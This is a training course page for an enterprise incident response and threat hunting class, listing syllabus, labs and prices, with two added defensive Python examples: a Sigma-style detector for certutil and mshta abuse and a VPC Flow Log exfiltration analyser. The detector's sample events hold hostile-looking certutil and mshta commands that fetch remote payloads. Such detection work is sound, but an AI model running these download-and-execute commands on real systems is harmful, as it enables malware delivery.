FOR608: Enterprise-Class Incident Response & Threat Hunting

FOR608 | Digital Forensics and Incident Response
  • 6 Days (Instructor-Led)
  • 36 Hours (Self-Paced)

Course created by: Mathias Fuchs, Mike Pilkington & Tarot (Taz) Wake

  • GIAC Enterprise Incident Responder (GEIR)
  • 36 CPEs

    Apply your credits to renew your certifications

  • In-Person, Virtual or Self-Paced

    Attend a live, instructor-led class at a location near you or remotely, or train on your time over 4 months

  • Intermediate Skill Level

    Course material is geared for cyber security professionals with hands-on experience

  • 20 Hands-On Lab(s)

    Apply what you learn with hands-on exercises and labs

Learn to identify and respond to enterprise-class incidents. Deepen your threat hunting abilities by using enterprise-class tools and digging into analysis methodologies to understand attacker movement.

Course Overview

In this enterprise incident response course, you'll learn to identify and respond to incidents too large to handle one machine at a time. The concepts are the same as in single-host forensics, gathering, analyzing, and making decisions, but applied to information from hundreds of machines. This requires the ability to automate collection and to quickly focus on the right information for analysis. Using example tools built to operate at enterprise scale, you will learn techniques to collect focused data for incident response and threat hunting. You will then dig into analysis methodologies, learning multiple approaches to understanding attacker movement and activity across hosts of varying functions and operating systems, using timeline, graphing, structured, and unstructured analysis techniques.

What You’ll Learn

  • Know when to perform deep host analysis vs. quick data collection at scale
  • Use collaboration tools for seamless remote teamwork
  • Gather forensic data from on-prem and cloud sources (Azure, M365, AWS)
  • Analyze Linux, Mac, and containerized (e.g., Docker) environments
  • Correlate data (network, endpoint, etc.) to uncover attacker actions
  • Analyze structured and unstructured data to reveal attacker behavior
  • Enrich data to identify IOCs, create detection signatures, and track incidents

Business Takeaways

  • Limit financial and reputational impact through precise incident response
  • Maximize efficiency with effective IR resource management
  • Collaborate seamlessly across teams using dedicated platforms
  • Detect and counter EDR and app control evasion on Windows
  • Analyze and respond to compromised Linux and macOS systems
  • Handle incidents in Docker, M365, AzureAD, and AWS environments

Course Syllabus

Explore the course syllabus below to view the full range of topics covered in FOR608: Enterprise-Class Incident Response & Threat Hunting.

Section 1: Proactive Detection and Response

Section one focuses on proactive cyber defense through early detection, rapid response, and collaboration using frameworks like MITRE ATT&CK. It covers active defense tactics like honeypots and canaries, as well as efficient incident response with tools like Aurora. We conclude with threat intelligence fundamentals and using platforms like MISP and OpenCTI.

Topics covered

  • Enterprise Incident Response and Threat Hunting
  • Managing Large-Scale Response
  • Intel-Driven Incident Response
  • Scalable & Collaborative Analysis with Timesketch

Labs

  • Development of honey tokens for active detection
  • Documenting an initial alert in Aurora
  • Using Timesketch to analyze a potential breach
  • Using OpenCTI to analyze threat reports

Section 2: Scaling Response and Analysis

Section two shifts to active response, starting with scoping an intrusion at Stark Research Labs. It highlights EDR evasion techniques and introduces Velociraptor for large-scale incident response. The section also covers integrating Velociraptor with Elasticsearch and emphasizes rapid, targeted data collection on specific hosts.

Topics covered

  • EDR and EDR Bypass
  • Scaling Incident Response with Velociraptor
  • Scaling Analysis with ELK
  • Rapid Response Triage

Labs

  • Analyzing Sysmon telemetry and log events
  • Analyzing data collected during an intrusion incident
  • Deploying a small Velociraptor client-server setup
  • Using the Elasticsearch SQL API
  • Acquiring forensic triage images using Velociraptor and CyLR

Section 3: Modern Attacks against Windows and Linux DFIR

Section three focuses on host-based forensics, covering Windows attacks such as ransomware and living-off-the-land binary (LOLBAS) abuse, with detection using Sigma rules, Elasticsearch, and Hayabusa. It then shifts to Linux DFIR, addressing exploits, file systems, logging, and hardening, building the skills to investigate both Windows and Linux intrusions.

Topics covered

  • Modern Attacks Against Windows
  • Introduction to Linux
  • Modern Attacks Against Linux
  • Linux DFIR Fundamentals and Log Analysis
  • Linux Triage Collection and Forensic Readiness

Labs

  • Detecting LOLBAS activity via Sigma
  • Rapid event log analysis with Hayabusa
  • Linux web log analysis
  • Triaging Linux hosts
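
To make the Sigma lab above concrete, the block below is an added example written for this page. It is not FOR608 lab material and not the Sigma project's own tooling (use sigma-cli or pySigma for real rule conversion). It evaluates a Sigma-style process_creation rule for certutil and mshta download or remote-script behaviour against Sysmon Event ID 1 records. The rule, the VendorUpdater.exe allow-list filter and the sample events are all constructed for the example, and the condition evaluator deliberately supports only the common "and/or/not" and "1 of"/"all of" forms without parentheses.

```python
"""Minimal evaluator for a Sigma-style process_creation rule over Sysmon
Event ID 1 records.  Added illustration for this page: not FOR608 course
material and not the Sigma project's own code (use sigma-cli or pySigma for
real rule conversion).  The rule and the sample events are constructed."""
import fnmatch

# Constructed rule, the Python equivalent of a Sigma YAML 'detection' block:
# LOLBAS download or remote script execution via certutil or mshta, with an
# allow-list filter for a hypothetical (made-up) updater parent process.
RULE = {
    "title": "LOLBAS Download or Remote Script Execution",
    "logsource": {"category": "process_creation", "product": "windows"},
    "detection": {
        "selection_certutil": {
            "Image|endswith": "\\certutil.exe",
            "CommandLine|contains|all": ["-urlcache", "http"],
        },
        "selection_mshta": {
            "Image|endswith": "\\mshta.exe",
            "CommandLine|contains": ["http://", "https://", "vbscript:", "javascript:"],
        },
        "filter_updater": {"ParentImage|endswith": "\\VendorUpdater.exe"},
        "condition": "1 of selection_* and not filter_updater",
    },
}

def _match_value(field_value, modifiers, pattern):
    """Apply Sigma string modifiers (contains/startswith/endswith, else exact)
    to one pattern.  Sigma string matching is case-insensitive by default."""
    if field_value is None:
        return False
    fv, pat = str(field_value).lower(), str(pattern).lower()
    if "contains" in modifiers:
        return pat in fv
    if "startswith" in modifiers:
        return fv.startswith(pat)
    if "endswith" in modifiers:
        return fv.endswith(pat)
    return fv == pat

def _selection_matches(selection, event):
    """Every field in a selection must match; a list of values matches on any
    value, or on all of them when the |all modifier is present."""
    for key, patterns in selection.items():
        field, *modifiers = key.split("|")
        patterns = patterns if isinstance(patterns, list) else [patterns]
        hits = [_match_value(event.get(field), modifiers, p) for p in patterns]
        if not (all(hits) if "all" in modifiers else any(hits)):
            return False
    return True

def _eval_term(term, results):
    """One condition term: '[not] name' or '[not] (1|all) of <glob>'."""
    words = term.split()
    negate = words[0] == "not"
    if negate:
        words = words[1:]
    if len(words) == 3 and words[1] == "of":
        names = fnmatch.filter(results, words[2])
        value = (all if words[0] == "all" else any)(results[n] for n in names)
    else:
        value = results[words[0]]
    return not value if negate else value

def _eval_condition(condition, results):
    """Sigma conditions without parentheses: an 'or' of 'and' groups of terms."""
    return any(all(_eval_term(t, results) for t in group.split(" and "))
               for group in condition.split(" or "))

def rule_matches(rule, event):
    """Evaluate every named selection, then the rule's condition over them."""
    detection = rule["detection"]
    results = {name: _selection_matches(sel, event)
               for name, sel in detection.items() if name != "condition"}
    return _eval_condition(detection["condition"], results)

# Constructed Sysmon Event ID 1 records, trimmed to the fields the rule uses.
SAMPLE_EVENTS = [
    {"Image": "C:\\Windows\\System32\\certutil.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "certutil.exe -urlcache -split -f http://203.0.113.10/a.txt C:\\Users\\Public\\a.exe"},
    {"Image": "C:\\Windows\\System32\\certutil.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "certutil -hashfile C:\\tools\\build.zip SHA256"},
    {"Image": "C:\\Windows\\System32\\mshta.exe", "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "mshta.exe https://203.0.113.10/payload.hta"},
    {"Image": "C:\\Windows\\System32\\mshta.exe", "ParentImage": "C:\\Program Files\\Vendor\\app.exe",
     "CommandLine": "mshta.exe C:\\Program Files\\Vendor\\ui.hta"},
    {"Image": "C:\\Windows\\System32\\certutil.exe", "ParentImage": "C:\\Program Files\\Vendor\\VendorUpdater.exe",
     "CommandLine": "certutil.exe -urlcache -f http://updates.example.com/patch.cab C:\\Temp\\patch.cab"},
]

def detect(events, rule=RULE):
    """Return the indices of the events the rule fires on."""
    return [i for i, ev in enumerate(events) if rule_matches(rule, ev)]

if __name__ == "__main__":
    for i in detect(SAMPLE_EVENTS):
        print(f"[{RULE['title']}] event {i}: {SAMPLE_EVENTS[i]['CommandLine']}")
```

Running the block flags events 0 and 2 (the certutil download and the remote .hta), while the hash-only certutil call, the local .hta, and the download launched by the allow-listed updater are left alone. The filter is what makes the rule deployable: without it, every legitimate updater that wraps certutil would page the on-call analyst.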

Section 4: Analyzing macOS and Docker Containers

This section covers macOS incident response, including its ecosystem, data acquisition, log analysis, and key artifacts. It also introduces containerized environments, focusing on Docker and its role in modern enterprise investigations.

Topics covered

  • macOS Foundations
  • Apple Filesystems
  • Mac Incident Response
  • Containers in the Enterprise
  • DFIR for Containers

Labs

  • Mount and analyze APFS disk images
  • Review macOS artifacts and logs
  • Docker administration and logs
  • Docker triage and IR

Section 5: Cloud Attacks and Response

This section covers incident response in Microsoft Azure, M365, and AWS, highlighting unique cloud challenges and the MITRE ATT&CK® Cloud Matrix. It focuses on common attack scenarios, key logs, and tools like GuardDuty. It concludes with strategies for cloud response using security accounts, AMIs, and automation tools like Lambda and Step Functions.

Topics covered

  • DFIR in the Cloud
  • Incident Response in Azure & M365
  • Attackers in the Cloud; AWS Foundations
  • Incident Response in AWS
  • IR Automation in AWS

Labs

  • M365 log analysis
  • Finding attacker cloud exfil infrastructure
  • AWS CloudTrail log analysis
  • AWS VPC Flow log analysis
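
The two AWS labs above (finding attacker exfil infrastructure and VPC Flow Log analysis) share one basic technique, so here is an added example for both. It is written for this page and is not FOR608 lab material or an AWS-provided tool. It parses VPC Flow Log records in the default version-2 field order, then sums accepted outbound bytes from internal hosts to external destinations to surface the destinations worth a closer look. The log lines, the account and interface IDs, and the RFC 1918 ranges used to define "internal" are constructed assumptions; in a real investigation substitute the VPC's actual CIDRs and any peered or on-prem ranges.

```python
"""Surface candidate exfiltration from AWS VPC Flow Logs: accepted outbound
bytes from internal hosts to external destinations, summed per destination.
Added illustration for this page, not FOR608 lab material and not an AWS
tool.  The records below are constructed in the default version-2 field order."""
import ipaddress
from collections import defaultdict

# Default VPC Flow Log (version 2) field order.
FIELDS = ("version account_id interface_id srcaddr dstaddr srcport dstport "
          "protocol packets bytes start end action log_status").split()

# Assumption: 'internal' means the RFC 1918 ranges plus loopback/link-local.
# In a real investigation substitute the VPC CIDRs and peered/on-prem ranges.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
                  "127.0.0.0/8", "169.254.0.0/16")]

# Constructed sample (documentation IPs, made-up account/ENI IDs): one host
# pushing ~48 MiB to a single external address on 443 in two flows, plus
# ordinary traffic, a rejected inbound probe and a NODATA placeholder record.
SAMPLE_LOG = """\
2 123456789012 eni-0a1b2c3d 10.0.1.23 203.0.113.45 51234 443 6 41000 26214400 1700000000 1700000060 ACCEPT OK
2 123456789012 eni-0a1b2c3d 10.0.1.23 203.0.113.45 51240 443 6 39000 24117248 1700000060 1700000120 ACCEPT OK
2 123456789012 eni-0a1b2c3d 10.0.1.23 10.0.2.10 51301 445 6 120 18400 1700000010 1700000030 ACCEPT OK
2 123456789012 eni-0a1b2c3d 10.0.1.23 198.51.100.7 51310 443 6 35 6200 1700000015 1700000040 ACCEPT OK
2 123456789012 eni-0a1b2c3d 198.51.100.200 10.0.1.23 40000 22 6 3 180 1700000020 1700000021 REJECT OK
2 123456789012 eni-0a1b2c3d - - - - - - - 1700000030 1700000090 - NODATA
"""

def parse_flow_log(text):
    """Yield one dict per record; skip NODATA/SKIPDATA records, whose traffic
    fields are '-' placeholders, and any line that does not fit the format."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != len(FIELDS):
            continue
        rec = dict(zip(FIELDS, parts))
        if rec["log_status"] != "OK":
            continue
        for k in ("srcport", "dstport", "protocol", "packets", "bytes", "start", "end"):
            rec[k] = int(rec[k])
        yield rec

def is_external(addr):
    """True when the address falls outside every configured internal range."""
    ip = ipaddress.ip_address(addr)
    return not any(ip in net for net in INTERNAL_NETS)

def outbound_exfil_candidates(records, threshold_bytes=10 * 1024 * 1024):
    """Sum ACCEPTed bytes per (internal src, external dst, dstport) and return
    the pairs at or above the threshold, largest first, with the flow count
    and the time window they span."""
    totals = defaultdict(lambda: {"bytes": 0, "flows": 0, "first": None, "last": None})
    for r in records:
        if r["action"] != "ACCEPT" or is_external(r["srcaddr"]) or not is_external(r["dstaddr"]):
            continue
        t = totals[(r["srcaddr"], r["dstaddr"], r["dstport"])]
        t["bytes"] += r["bytes"]
        t["flows"] += 1
        t["first"] = r["start"] if t["first"] is None else min(t["first"], r["start"])
        t["last"] = r["end"] if t["last"] is None else max(t["last"], r["end"])
    hits = [(k, v) for k, v in totals.items() if v["bytes"] >= threshold_bytes]
    return sorted(hits, key=lambda kv: kv[1]["bytes"], reverse=True)

if __name__ == "__main__":
    for (src, dst, port), v in outbound_exfil_candidates(parse_flow_log(SAMPLE_LOG)):
        print(f"{src} -> {dst}:{port}  {v['bytes'] / 1048576:.1f} MiB in {v['flows']} flows "
              f"over {v['last'] - v['first']}s")
```

On the sample it reports a single candidate, 10.0.1.23 pushing 48 MiB to 203.0.113.45:443 in two flows over 120 seconds, and ignores the internal SMB traffic, the small HTTPS session, the rejected probe and the NODATA record. Flow logs carry no payload, so the output is a lead, not a verdict: the next step is to pivot on the destination in CloudTrail, DNS logs and the host's own telemetry.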

Section 6: Capstone: Enterprise-Class IR Challenge

Section six is the capstone exercise, where students apply course concepts to analyze a multi-platform breach. Using real-world tools and techniques, they’ll investigate an end-to-end incident across hosts and cloud systems, working in teams to simulate real-world response.

Things You Need To Know

Relevant Job Roles

  • Cyber Incident Responder (European Cybersecurity Skills Framework): Monitor the organisation's cybersecurity state, handle incidents during cyber-attacks and assure the continued operations of ICT systems.
  • Insider Threat Analysis (NICE: Protection and Defense): Responsible for identifying and assessing the capabilities and activities of cybersecurity insider threats; produces findings to help initialize and support law enforcement and counterintelligence activities and investigations.
  • Digital Forensics (OPM 212; NICE: Protection and Defense): Responsible for analyzing digital evidence from computer security incidents to derive useful information in support of system and network vulnerability mitigation.
  • Cybercrime Investigation (OPM 221; NICE: Investigation): Responsible for investigating cyberspace intrusion incidents and crimes. Applies tactics, techniques, and procedures for a full range of investigative tools and processes and appropriately balances the benefits of prosecution versus intelligence gathering.
  • Military Operations / Law Enforcement Agents (Digital Forensics and Incident Response): Execute digital forensic operations under demanding conditions, rapidly extracting critical intelligence from diverse devices. Leverage advanced threat hunting and malware analysis skills to neutralize sophisticated cyber adversaries.
  • Cybersecurity Analyst / Engineer (Cyber Defense): An advanced role requiring high competence in threat detection, threat analysis, and threat protection; vital to preserving the security and integrity of an organization's data.
  • Incident Response (OPM 531; NICE: Protection and Defense): Responsible for investigating, analyzing, and responding to network cybersecurity incidents.
  • Digital Evidence Analysis (OPM 211; NICE: Investigation): Responsible for identifying, collecting, examining, and preserving digital evidence using controlled and documented analytical and investigative techniques.

Course Schedule & Pricing

  • Virtual (OnDemand), self-paced with 4 months access, instructed by Mike Pilkington: $8,780 USD
  • Riyadh, SA & Virtual (live), instructed by Mathias Fuchs: $8,900 USD
  • Washington, DC, US & Virtual (live), instructed by Marcus Guevara: $8,780 USD
  • Salt Lake City, UT, US & Virtual (live), instructed by Mike Pilkington: $8,780 USD
  • Malaga, ES, instructed by Mathias Fuchs: €8,230 EUR
  • Las Vegas, NV, US & Virtual (live), instructed by Mike Pilkington: $8,780 USD
  • Virtual (live), instructor not listed: $8,780 USD
  • Singapore, SG & Virtual (live), instructed by Mathias Fuchs: $8,900 USD

Prices exclude applicable local taxes. Dates for the live events are published on each event's details page; 8 of 13 scheduled offerings are listed here. Group purchase options are available on request.
